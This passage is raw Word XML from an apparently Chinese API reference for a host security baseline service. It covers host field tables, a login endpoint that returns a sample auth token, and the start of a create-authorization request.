          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C10B37A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="013086E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB395F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D8D2D54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C76A73F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C21F7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D3F0C3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C5C72B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D7761E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFAE1A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49AF54E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6658F337" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07381E51" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F34AA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B83FF58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E7DDE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6257D319" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EEFBC88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E205C3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A7F57CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A1794BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E4A4371" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620A2C53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B536A08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09A1FF28" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45B1FCB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5838BB17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136E4D8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05BB8260" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C64859" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD23542" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E51DDEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="058555F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="_Toc115166255"/>
      <w:bookmarkStart w:id="366" w:name="登录请求"/>
      <w:bookmarkEnd w:id="364"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>登录请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
    </w:p>
    <w:p w14:paraId="673FF4AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A1B57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/auth/login/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02179C92"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149"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="09B5AC5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EDE36D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DEB0A50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF763A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DD04D6F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A08C4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F331687" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F4077F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7913AE86" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B375AF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75A88B31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF0C71E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="056416EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="031B48B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48C135AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3734F33C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BD01234" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857571E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        //验证账号密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password": "xxx"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B5E80D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293FF83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "1da285b0062c4b0ca56f24dfce25b7f8"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BDEE53"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224"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="2878"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="612D4DC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B6CC6A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="770E196F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F2A192" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F1C6C57" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220CDEB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C9317A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B7C0017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73DF8AD0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4075145B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="669ABD39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595A2F90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登陆产生的token,30min失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61DD5628" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="_Toc115166256"/>
      <w:bookmarkStart w:id="368" w:name="新建授权请求"/>
      <w:bookmarkEnd w:id="366"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>新建授权请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
    </w:p>
    <w:p w14:paraId="033F1B78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270D8364" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/auth/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C766108"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225"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="6904"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3891600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475483E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="526178A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="005E312E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7833996E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1D5D09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D86F37E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D37FEB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="595B5F0D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E9200D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7236A632" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3592BCA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CFA250C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215A6B83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DB48BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B829E28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ABD188A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136BFFE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3144D96C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3955C6EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机范围：1-自定义，包括业务组、主机；0-全部主机，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="616BBEA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33632094" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE59B50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
